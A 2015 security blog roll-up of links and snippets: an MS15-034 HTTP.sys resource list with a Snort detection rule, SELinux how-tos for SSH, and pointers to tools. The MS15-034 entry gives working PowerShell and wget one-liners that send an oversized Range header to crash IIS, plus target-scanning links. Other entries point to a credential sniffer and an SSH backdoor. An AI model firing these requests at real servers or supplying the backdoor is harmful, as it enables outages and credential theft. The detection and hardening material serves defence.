Apr 15, 2015

Resource for MS15-034 (HTTP.sys Exploit)

Microsoft Link: https://technet.microsoft.com/library/security/ms15-034
Metasploit: https://github.com/rapid7/metasploit-framework/pull/5150
DoS script in C language:
- http://www.exploit-db.com/exploits/36773/
- https://ghostbin.com/paste/semkg
DoS script in Python:
- http://pastebin.com/raw.php?i=ypURDPc4 
- http://pastebin.com/wWGFFZpG
DoS with telnet: https://twitter.com/NexusFandom/status/588254994203303937/photo/1
DoS with wget: https://twitter.com/w3bd3vil/status/588339547898941440
Some article: https://ma.ttias.be/remote-code-execution-via-http-request-in-iis-on-windows/
Plugin of IDAPro for diff: https://github.com/joxeankoret/diaphora
Shodan: https://www.shodan.io/search?query=IIS
Discussion:  https://github.com/rapid7/metasploit-framework/pull/5150
Memory Leak: https://www.cloudshark.org/captures/0132eb74ecd3

List the IP addresses HTTP.sys is listening on: netsh http show iplisten
Snort rule for detection (from https://isc.sans.edu/diary/MS15-034%3A+HTTP.sys+%28IIS%29+DoS+And+Possible+Remote+Code+Execution.+PATCH+NOW/19583):
alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg: "MS15-034 Range Header HTTP.sys Exploit"; content: "|0d 0a|Range: bytes="; nocase; content: "-"; within: 20; byte_test: 10,>,1000000000,0,relative,string,dec; sid: 1001239;)
(byte_test is limited to 10 bytes, so I just check if the first 10 bytes are larger than 1000000000)
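The rule's byte_test check, re-implemented as an added Python example (not code from the ISC diary or from this page) so it can be run over constructed requests; next to the 10-byte view the rule sees, it parses the full Range end value, which makes the truncation described in the note above visible.

```python
# Added example (not from the diary or this page): the ISC Snort rule's matching logic
# in Python, next to a full-precision parse of the Range header. Samples are constructed.
SNORT_THRESHOLD = 1_000_000_000   # byte_test: 10,>,1000000000,0,relative,string,dec
BYTE_TEST_WIDTH = 10              # byte_test converts at most 10 bytes
MARKER = b"\r\nrange: bytes="     # content:"|0d 0a|Range: bytes="; nocase

def snort_rule_matches(request: bytes) -> bool:
    """Marker (case-insensitive), then '-' within 20 bytes, then up to 10 bytes
    after the '-' read as a decimal string and compared with the threshold."""
    i = request.lower().find(MARKER)
    if i < 0:
        return False
    pos = i + len(MARKER)
    dash = request.find(b"-", pos, pos + 20)          # content:"-"; within:20
    if dash < 0:
        return False
    window = request[dash + 1:dash + 1 + BYTE_TEST_WIDTH]
    ndigits = len(window) - len(window.lstrip(b"0123456789"))
    return ndigits > 0 and int(window[:ndigits]) > SNORT_THRESHOLD

def parse_ranges(request: bytes) -> list:
    """All (start, end) pairs of the first Range header at full precision;
    a missing start or end (suffix or open-ended range) becomes None."""
    i = request.lower().find(MARKER)
    if i < 0:
        return []
    spec = request[i + len(MARKER):].split(b"\r\n", 1)[0]
    pairs = []
    for part in spec.split(b","):
        first, _, last = part.strip().partition(b"-")
        pairs.append((int(first) if first.isdigit() else None,
                      int(last) if last.isdigit() else None))
    return pairs

def max_range_end(request: bytes):
    """Largest end offset seen, as a real integer, or None."""
    ends = [e for _, e in parse_ranges(request) if e is not None]
    return max(ends) if ends else None

# Constructed samples: the Range value the page's one-liners use, a normal
# partial-content request, and an end whose first ten digits equal the threshold
# (the 10-byte byte_test limit the diary author mentions: rule quiet, value 10**12).
SAMPLE_EXPLOIT = (b"GET /iisstart.htm HTTP/1.1\r\nHost: example.test\r\n"
                  b"Range: bytes=18-18446744073709551615\r\n\r\n")
SAMPLE_BENIGN = (b"GET /video.mp4 HTTP/1.1\r\nHost: example.test\r\n"
                 b"Range: bytes=0-1023\r\n\r\n")
SAMPLE_TRUNCATED = (b"GET /a.bin HTTP/1.1\r\nHost: example.test\r\n"
                    b"range: BYTES=0-1000000000000\r\n\r\n")
```

The third sample is not flagged by the rule although its end value is far above the threshold, which is exactly the 10-byte limit the diary notes; a sensor that needs the real value has to parse the header as parse_ranges does.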

Nmap script: https://github.com/pr4jwal/quick-scripts/blob/master/ms15-034.nse

powershell -com {$wr=[Net.WebRequest]::Create( 'http://[ipaddress]/iisstart.htm');$wr.AddRange('bytes' ,0,18446744073709551615);$wr.GetResponse();$wr.close()}


Derived from MS15-034 (IIS Killer, by Sam): https://samsclass.info/123/proj14/iis-killer.htm

Masscan: http://blog.erratasec.com/2015/04/masscanning-for-ms15-034.html

Exploit in another service by Francisco Falcon (@fdfalcon)

From YouTube (@Matthew Phillips): https://www.youtube.com/watch?v=BlBXREzsytc&feature=youtu.be
Make sure you request a valid resource; I found pointing at / didn't work.

wget --header="Range: bytes=18-18446744073709551615"

Apr 14, 2015

Conference:: BSides 2015

Link:: http://www.irongeek.com/i.php?page=videos/bsidesnashville2015/mainlist 

Download: https://archive.org/details/BSidesNashville2015

Tools: net-creds - Sniffs sensitive data from interface or pcap

Thoroughly sniff passwords and hashes from an interface or pcap file. Concatenates fragmented packets and does not rely on ports for service identification.
  • URLs visited
  • POST loads sent
  • HTTP form logins/passwords
  • HTTP basic auth logins/passwords
  • HTTP searches
  • FTP logins/passwords
  • IRC logins/passwords
  • POP logins/passwords
  • IMAP logins/passwords
  • Telnet logins/passwords
  • SMTP logins/passwords
  • SNMP community string
  • NTLMv1/v2 all supported protocols like HTTP, SMB, LDAP, etc
  • Kerberos
Download:: https://github.com/DanMcInerney/net-creds

Apr 2, 2015

Howto: Set up SSH on a port other than 22 with SELinux

List the ports currently labelled for each service
/usr/sbin/semanage port -l

Add port 1234 for ssh service
/usr/sbin/semanage port -a -t ssh_port_t -p tcp 1234 

Howto: Solve the SSH + PAM_Radius SELinux denial

I found that the log says:

Apr  2 14:38:10 localhost audispd: node=localhost.localdomain type=AVC msg=audit(1427960289.654:338076): avc:  denied  { name_bind } for  pid=3146 comm="sshd" src=32766 scontext=unconfined_u:system_r:sshd_t:s0-s0:c0.c1023 tcontext=system_u:object_r:port_t:s0 tclass=udp_socket

So this is the way to solve this problem (sshd_t is denied name_bind on a generic port_t UDP port, the source port the RADIUS client uses):

1. Create the policy file "sshd-radius.te" with an allow rule that matches the denial above
policy_module(sshd-radius, 1.0)
gen_require(` type sshd_t; type port_t; ')
# let sshd (the pam_radius client side) bind its UDP source port
allow sshd_t port_t:udp_socket name_bind;
2. Compile it
# make -f /usr/share/selinux/devel/Makefile

3. Install it
# semodule -i sshd-radius.pp

Source:: https://bugzilla.redhat.com/show_bug.cgi?id=647043
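The allow rule the module needs follows mechanically from the AVC line, which is what audit2allow automates; the following added Python example (not from the bugzilla thread or this page) builds the .te text from one or more denial lines, using the denial quoted above as its constructed sample.

```python
# Added example (not from the bugzilla thread or this page): derive the allow rule a
# policy module needs from AVC denial lines, the way audit2allow does. The sample
# line is the denial from the log above, joined onto one line.
import re

AVC_RE = re.compile(
    r"avc:\s+denied\s+\{(?P<perms>[^}]*)\}.*?"
    r"scontext=(?P<scon>\S+).*?tcontext=(?P<tcon>\S+).*?tclass=(?P<tclass>\w+)")


def parse_avc(line: str) -> dict:
    """Pull permissions, source type, target type and object class out of one
    AVC line. Contexts are user:role:type[:range], so the type is field 2."""
    m = AVC_RE.search(line)
    if not m:
        raise ValueError("not an AVC denial line: %r" % line)
    return {"perms": set(m["perms"].split()),
            "stype": m["scon"].split(":")[2],
            "ttype": m["tcon"].split(":")[2],
            "tclass": m["tclass"]}


def make_module(lines, name="sshd-radius", version="1.0") -> str:
    """Build .te text: one allow rule per (source, target, class) with the
    permissions merged, and every referenced type declared in gen_require."""
    rules = {}
    for line in lines:
        d = parse_avc(line)
        rules.setdefault((d["stype"], d["ttype"], d["tclass"]), set()).update(d["perms"])
    types = sorted({s for s, _, _ in rules} | {t for _, t, _ in rules})
    out = ["policy_module(%s, %s)" % (name, version), "", "gen_require(`"]
    out += ["\ttype %s;" % t for t in types]
    out += ["')", ""]
    for (s, t, c), perms in sorted(rules.items()):
        out.append("allow %s %s:%s { %s };" % (s, t, c, " ".join(sorted(perms))))
    return "\n".join(out) + "\n"


# Constructed sample: the denial quoted above, on one line
AVC_LINE = ('Apr  2 14:38:10 localhost audispd: node=localhost.localdomain type=AVC '
            'msg=audit(1427960289.654:338076): avc:  denied  { name_bind } for  pid=3146 '
            'comm="sshd" src=32766 scontext=unconfined_u:system_r:sshd_t:s0-s0:c0.c1023 '
            'tcontext=system_u:object_r:port_t:s0 tclass=udp_socket')

if __name__ == "__main__":
    print(make_module([AVC_LINE]))  # paste into sshd-radius.te, then steps 2 and 3
```

Review the generated rule before installing it: an allow derived from a denial grants exactly what was denied, so if the denial itself looks like misbehaviour rather than a missing rule, the fix is elsewhere.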

Mar 30, 2015

Tools: Malcom - Malware Communication Analyzer

Malcom is a tool designed to analyze a system's network communication using graphical representations of network traffic, and to cross-reference them with known malware sources. This comes in handy when analyzing how certain malware species try to communicate with the outside world.

Malcom can help you:
  • detect central command and control (C&C) servers
  • understand peer-to-peer networks
  • observe DNS fast-flux infrastructures
  • quickly determine if a network artifact is 'known-bad'
The aim of Malcom is to make malware analysis and intel gathering faster by providing a human-readable version of network traffic originating from a given host or network. Convert network traffic information to actionable intelligence faster.

Source:: https://github.com/tomchop/malcom

Tools: Troubleshooter - Exploit SELinux (Setroubleshoot)

The revenge of GingerBreak

Abstract: This paper demonstrates vulnerabilities within the SELinux framework as well as shortcomings in the type enforcement setup. I will show how to deconstruct a SELinux setup with some simple 80's style exploit techniques. While reading this paper, I recommend listening to this music from the year of morrisworm.
When in 2012 the SELinux developers analyzed the behavior of an exploit that was not designed to run on a SELinux system on page 32 of these slides, it triggered a review-selector for SELinux and I put it on the list of my audit targets. Not surprisingly, GingerBreak lost that "competition", just because it was not made for it. Using my QUANTUM AUDIT techniques I was now able to have a deeper look into SELinux itself to see whether the claims that were made really hold.

Source:: https://github.com/stealth/troubleshooter


Tools: Paramiko - Python SSH Backdoor

SSH Backdoor using Paramiko

Source:: https://github.com/joridos/custom-ssh-backdoor